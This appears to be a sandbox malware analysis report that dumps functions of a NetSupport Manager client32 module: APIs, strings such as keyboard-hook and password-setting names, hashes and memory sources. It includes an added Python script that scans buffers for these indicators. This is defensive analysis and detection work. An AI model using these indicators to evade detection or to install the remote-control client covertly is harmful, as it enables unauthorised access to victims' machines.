                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID: $14/03/16 10:38:31 V12.10F8$364339$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                    • API String ID: 1029625771-4278707901
                                                                                    • Opcode ID: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                    • Instruction ID: 8eab5b2d156e186679f92ce27f1e5cdd209b728942572a9b5b46018c3091c824
                                                                                    • Opcode Fuzzy Hash: efde7a6f29c4b35a1bc2373ff856d498f8aef1b4f42035034b7e6d706e59a609
                                                                                    • Instruction Fuzzy Hash: 97C1D275E0026AAFDF22DF959C84BEDF7B9AB44308F9440EDE55867280D770AE80CB51
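The String ID and APIs lines of these function dumps are what pin the module to a NetSupport Manager client32 build rather than generic Windows code: client32.ini, NSM.LIC, the NSMWClass window class, the NSMString.h source path and the V12.10F8 stamp, while setupapi.dll, psapi.dll, Wtsapi32.dll and pcihooks are resolved at run time through LoadLibraryA/GetProcAddress instead of appearing in the static import table. The Python triage script below is an added example, not Joe Sandbox or NetSupport code. It searches a buffer (a memory dump or the unpacked file) for those indicators, counts a run-time-resolved function name only when its module name is also present, and applies hit thresholds that are an assumption of this example; the two sample buffers at the bottom are constructed for the offline demonstration.

```python
"""Offline triage for the NetSupport client32 artefacts listed in this report.

Added example (not Joe Sandbox or NetSupport code). The indicator lists below
are copied from the String ID and APIs lines of the function dumps; the two
sample buffers at the bottom are constructed for the demonstration, and the
hit thresholds in verdict() are an assumption, not a published rule.
"""
from dataclasses import dataclass

# Strings that pin the module to a NetSupport Manager client32 build.
NETSUPPORT_STRINGS = [
    b"client32.ini",
    b"NSM.LIC",
    b"NSMWClass",
    b"client32 dbi %hs",
    b"DisableConsoleClient",
    b"Trying to get mac addr for %u.%u.%u.%u",
    b"e:\\nsmsrc\\nsm\\1210\\1210f\\ctl32\\NSMString.h",
    b"14/03/16 10:38:31 V12.10F8",
]

# Module -> functions the code resolves with LoadLibraryA/GetProcAddress at run
# time (they do not appear in the static import table, so search for the names).
DYNAMIC_IMPORTS = {
    b"setupapi.dll": [b"SetupDiGetClassDevsA", b"SetupDiEnumDeviceInterfaces",
                      b"SetupDiGetDeviceInterfaceDetailA",
                      b"SetupDiDestroyDeviceInfoList"],
    b"psapi.dll": [b"GetProcessHandleCount", b"GetGuiResources",
                   b"GetProcessMemoryInfo"],
    b"Wtsapi32.dll": [b"WTSQuerySessionInformationA", b"WTSFreeMemory"],
    b"pcihooks": [b"HookKeyboard"],
}


@dataclass(frozen=True)
class Hit:
    kind: str      # "string" or "dynamic_import"
    value: str     # indicator text, or "module!function"
    offset: int    # byte offset in the scanned buffer


def find_all(buf, needle):
    """Every offset at which needle occurs in buf (8-bit ASCII, case-sensitive)."""
    offsets, start = [], 0
    while True:
        idx = buf.find(needle, start)
        if idx == -1:
            return offsets
        offsets.append(idx)
        start = idx + 1


def scan(buf):
    """Collect indicator hits. A resolved function name only counts when the
    module it is resolved from is present too, which filters out unrelated
    programs that merely happen to call one of these APIs."""
    hits = []
    for s in NETSUPPORT_STRINGS:
        hits.extend(Hit("string", s.decode(), off) for off in find_all(buf, s))
    for dll, funcs in DYNAMIC_IMPORTS.items():
        if not find_all(buf, dll):
            continue
        for fn in funcs:
            label = f"{dll.decode()}!{fn.decode()}"
            hits.extend(Hit("dynamic_import", label, off) for off in find_all(buf, fn))
    return hits


def verdict(hits, min_strings=3, min_dynamic=2):
    """Assumed thresholds: several product strings plus more than one
    run-time-resolved API before calling the buffer a NetSupport client."""
    n_str = sum(1 for h in hits if h.kind == "string")
    n_dyn = sum(1 for h in hits if h.kind == "dynamic_import")
    return n_str >= min_strings and n_dyn >= min_dynamic


# Constructed sample: NUL-separated strings as they would sit in a data section dump.
SAMPLE_BUFFER = b"\x00".join([
    b"MZ", b"client32.ini", b"NSM.LIC", b"NSMWClass",
    b"Trying to get mac addr for %u.%u.%u.%u",
    b"setupapi.dll", b"SetupDiGetClassDevsA", b"SetupDiEnumDeviceInterfaces",
    b"Wtsapi32.dll", b"WTSQuerySessionInformationA",
    b"pcihooks", b"HookKeyboard",
]) + b"\x00"

# Constructed benign buffer: one setupapi call, none of the product strings.
BENIGN_BUFFER = b"\x00".join([
    b"kernel32.dll", b"GetProcAddress", b"setupapi.dll",
    b"SetupDiGetClassDevsA", b"user32.dll",
]) + b"\x00"


if __name__ == "__main__":
    for name, buf in (("sample", SAMPLE_BUFFER), ("benign", BENIGN_BUFFER)):
        hits = scan(buf)
        print(f"{name}: {len(hits)} hits, netsupport={verdict(hits)}")
        for h in hits:
            print(f"  {h.offset:#08x} {h.kind:15} {h.value}")
```

The search is 8-bit only because every string and API name in this report is ANSI (the A-suffixed APIs, the %hs format); a dump that stores the same text as UTF-16 would need the needles widened. A positive verdict identifies the NetSupport client component, not intent: NetSupport Manager is a commercial remote-control product, so the same strings appear in sanctioned deployments, and the decision whether this instance is the abused build belongs with the persistence and network evidence elsewhere in the report.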

                                                                                    Control-flow Graph: rendered graph not captured in extraction; basic blocks span 111414a0-1114188a and the API calls on its paths are listed under APIs below.
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(User32.dll,00000000,00000000), ref: 111414F3
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 11141563
                                                                                    • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 11141586
                                                                                    • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 111415E5
                                                                                    • _memset.LIBCMT ref: 111415F9
                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 11141649
                                                                                    • GetStockObject.GDI32(00000000), ref: 11141653
                                                                                    • RegisterClassExA.USER32(?), ref: 1114166A
                                                                                    • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11141702
                                                                                    • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11141717
                                                                                    • SetTimer.USER32(00000000,00000000,000003E8,1113CD60), ref: 1114183A
                                                                                    • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11141868
                                                                                    • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11141873
                                                                                      • Part of subcall function 11017450: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,420B7E12,1102FCB2,00000000), ref: 1101747E
                                                                                      • Part of subcall function 11017450: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                      • Part of subcall function 11017450: GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                      • Part of subcall function 11017450: FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                      • Part of subcall function 110CC7F0: CreateWindowExA.USER32(00000000,button,11194244,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000000,00000000), ref: 110CC829
                                                                                      • Part of subcall function 110CC7F0: SetClassLongA.USER32(00000000,000000E8,110CC570), ref: 110CC840
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Library$Load$Class$AddressCreateFreeProc$CursorEventInfoLongObjectRegisterStockTimerWindow_memset
                                                                                    • String ID: *quiet$HookKeyboard$InitUI (%d)$NSMGetAppIcon()$NSMWClass$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                                                    • API String ID: 3706574701-3145203681
                                                                                    • Opcode ID: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                    • Instruction ID: 9b294397b9efa9119a6c3372e39ca87a41eafe2d9b680e3b49ce131b24699399
                                                                                    • Opcode Fuzzy Hash: bf77d67e3ec3500b8f2db5927d4705f1cc154319e5a682cee20025d48f6291c1
                                                                                    • Instruction Fuzzy Hash: 6EA19DB4E0126AAFDB01DFE9C9C4AADFBB4FB4870DB60413EE52997644EB306440CB55

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6F9C1370,?,0000001A), ref: 110286DD
                                                                                    • _strrchr.LIBCMT ref: 110286EC
                                                                                      • Part of subcall function 111646CE: __stricmp_l.LIBCMT ref: 1116470B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileModuleName__stricmp_l_strrchr
                                                                                    • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat
                                                                                    • API String ID: 1609618855-357498123
                                                                                    • Opcode ID: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                    • Instruction ID: efd952e0d0f75bab71a6f775fe147756553f35749af42d5d105ea8c6321280ff
                                                                                    • Opcode Fuzzy Hash: f758b9b815b32a629a166d271db5dcc578b7f2649effa84e62f149b16d96c17d
                                                                                    • Instruction Fuzzy Hash: ED12D67CD0929A8BDB17CF64CC807E5B7F5AB19308F8400EEE9D557201EB729686CB52

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(?,00000001,0000DD7C), ref: 1108678C
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 110867AA
                                                                                    • LoadLibraryA.KERNEL32(?), ref: 110867EC
                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_Create), ref: 11086807
                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_Destroy), ref: 1108681C
                                                                                    • GetProcAddress.KERNEL32(00000000,CipherServer_GetInfoBlock), ref: 1108682D
                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_OpenSession), ref: 1108683E
                                                                                    • GetProcAddress.KERNEL32(?,CipherServer_CloseSession), ref: 1108684F
                                                                                    • GetProcAddress.KERNEL32(00000000,CipherServer_EncryptBlocks), ref: 11086860
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$LibraryLoad$FileModuleName
                                                                                    • String ID: CipherServer_CloseSession$CipherServer_Create$CipherServer_DecryptBlocks$CipherServer_Destroy$CipherServer_EncryptBlocks$CipherServer_GetInfoBlock$CipherServer_GetRandomData$CipherServer_OpenSession$CipherServer_ResetSession$CryptPak.dll
                                                                                    • API String ID: 2201880244-3035937465
                                                                                    • Opcode ID: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                    • Instruction ID: c81deb3771c39ade44f8803fbe1e6421c41fb3d40bd553f41274565aeadcb2b4
                                                                                    • Opcode Fuzzy Hash: 4b4bd3f155fc2ea4308a314feeb32441d96d80ab178d9e56264d575cdcc26986
                                                                                    • Instruction Fuzzy Hash: CD51C174E1834A9BD710DF79DC94BA6FBE9AF54304B1289AED885C7240EAB2E444CF50

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 1114194A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                    • API String ID: 3535843008-2062829784
                                                                                    • Opcode ID: 4154c40c43665f62878aea5254195e6e6e08202dfc88ecc93f42b5d3f19d5548
                                                                                    • Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
                                                                                    • Opcode Fuzzy Hash: 4154c40c43665f62878aea5254195e6e6e08202dfc88ecc93f42b5d3f19d5548
                                                                                    • Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                    • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                    • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                    • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                    • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                    • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                    • _strncpy.LIBCMT ref: 11074B68
                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
                                                                                    • CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
                                                                                    • SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
                                                                                    • std::exception::exception.LIBCMT ref: 11074D68
                                                                                    • __CxxThrowException@8.LIBCMT ref: 11074D83
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                    • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                    • API String ID: 703120326-1497550179
                                                                                    • Opcode ID: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                    • Instruction ID: 2d3153b5a6430d98d64e81d2a1e668bfe4de0d121a1dff3557e595bbadcf65c6
                                                                                    • Opcode Fuzzy Hash: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                    • Instruction Fuzzy Hash: 79B1A4B5A00359AFD710CF64CD84FDAF7F4BB48708F0085A9E65997281EBB0B944CB65

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                      • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                      • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                    • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 11108E19
                                                                                    • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
                                                                                    • LoadLibraryA.KERNEL32(?), ref: 11108E61
                                                                                    • GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
                                                                                    • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
                                                                                    • FreeLibrary.KERNEL32(?), ref: 11108ECB
                                                                                      • Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                      • Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                      • Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                      • Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                    • GetStockObject.GDI32(0000000D), ref: 11108EDF
                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
                                                                                    • InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
                                                                                    • InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16
                                                                                      • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                      • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                    • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59
                                                                                      • Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                      • Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                      • Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                    • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
                                                                                    • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                    • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                    • API String ID: 3930710499-403456261
                                                                                    • Opcode ID: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                    • Instruction ID: 229803012459fbbe5cfd3a30b02a894d1af5bad55287ed163187595495ff030c
                                                                                    • Opcode Fuzzy Hash: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                    • Instruction Fuzzy Hash: DC81AFB4E0435AEFEB55DFB48C89B9AFBE9AB48308F00457DE569D7280E7309944CB11

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                      • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                      • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                      • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                    • PostMessageA.USER32(00030462,000006CF,00000007,00000000), ref: 11138E0F
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • SetWindowTextA.USER32(00030462,00000000), ref: 11138EB7
                                                                                    • IsWindowVisible.USER32(00030462), ref: 11138F7C
                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
                                                                                    • IsWindowVisible.USER32(00030462), ref: 11138FAA
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 11138FD8
                                                                                    • EnableWindow.USER32(00030462,00000001), ref: 11138FE7
                                                                                    • IsWindowVisible.USER32(00030462), ref: 11139038
                                                                                    • IsWindowVisible.USER32(00030462), ref: 11139045
                                                                                    • EnableWindow.USER32(00030462,00000000), ref: 11139059
                                                                                    • EnableWindow.USER32(00030462,00000000), ref: 11138FBF
                                                                                      • Part of subcall function 11131210: ShowWindow.USER32(00030462,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                    • EnableWindow.USER32(00030462,00000001), ref: 1113906D
                                                                                    Strings
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                    • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                    • API String ID: 3453649892-3803836183
                                                                                    • Opcode ID: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                    • Instruction ID: ae8ec3c714d324370739ddb1cab1952d607c59122f5be0bb7ac7fd02d25128b2
                                                                                    • Opcode Fuzzy Hash: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                    • Instruction Fuzzy Hash: 86C12A75A1122A9BEB11DFF4CD80B6EF769ABC072DF140138EA159B28CEB75E804C751
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
  • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
• wsprintfA.USER32 ref: 11028214
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
• GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
• wsprintfA.USER32 ref: 11028291
• CloseHandle.KERNEL32(?), ref: 110282A7
• CloseHandle.KERNEL32(?), ref: 110282B0
• LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
• GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
Strings
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
• String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
• API String ID: 512045693-419896573
• Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
• Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
• Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
• Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
APIs
• LoadLibraryA.KERNEL32(PCIINV.DLL,420B7E12,028577F0,028577E0,?,00000000,1118276C,000000FF,?,11031942,028577F0,00000000,?,?,?), ref: 11085E45
  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
  • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
• GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
• GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
• GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
• wsprintfA.USER32 ref: 11085F1B
• wsprintfA.USER32 ref: 11085F32
• wsprintfA.USER32 ref: 11085F49
• CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
  • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,028577F0,00000000,?,?,?), ref: 11085A98
  • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,028577F0,00000000,?,?,?), ref: 11085AAB
  • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,028577F0,00000000,?,?,?), ref: 11085ABE
  • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,110860C0,?,11031942,028577F0,00000000,?,?,?), ref: 11085AD1
Strings
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
• String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
• API String ID: 4263811268-2492245516
• Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
• Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
